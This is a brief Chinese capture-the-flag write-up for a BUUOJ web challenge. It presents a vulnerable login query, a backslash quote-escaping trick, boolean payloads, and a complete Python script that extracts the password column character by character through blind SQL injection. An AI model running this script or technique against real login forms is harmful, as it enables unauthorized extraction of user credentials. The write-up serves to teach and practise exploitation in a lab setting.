前言
以前做的题
题解
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
传入admin\和or/**/length(database())>0#会回显stronger字样
传入admin\和or/**/length(database())<0#会回显girl friend字样
import requests
import time
url = "http://0f34fb9a-d697-428e-8383-5e31b7f7cdd0.node3.buuoj.cn/index.php"
# The username ends in a backslash so that, in the string-built query shown
# above, the closing quote of the username literal is escaped and the
# "password" value ends up inside the SQL expression.  The doubled backslash
# is Python's escaping for one "\" character.  The server-side cause is
# interpolating request fields straight into SQL; a parameterized query would
# not be affected by the backslash.
data = {"username": "admin\\", "password": ""}  # needs escaping in Python too
result = ""  # characters recovered so far
i = 0  # 1-based index of the character currently being probed
while(True):
    time.sleep(0.2)  # delay between probes
    i = i + 1
    # Binary search over the ASCII range [32, 127) for the character at
    # position i; each request halves the range based on which of the two
    # response texts the page returns.
    head = 32
    tail = 127
    while(head < tail):
        mid = (head + tail) >> 1
        # payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
        payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
        data['password'] = payload
        r = requests.post(url, data=data)
        # "stronger" is the response for the true branch (see the notes
        # above), i.e. the character is greater than mid.
        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid
    last = result  # NOTE(review): assigned but never read
    # If no comparison was ever true, head is still 32 -- presumably the
    # position is past the end of the value, so stop.
    if head != 32:
        result += chr(head)
    else:
        break
# NOTE(review): indentation was lost in the source; this print may
# originally have been inside the outer loop to show progress.
print(result)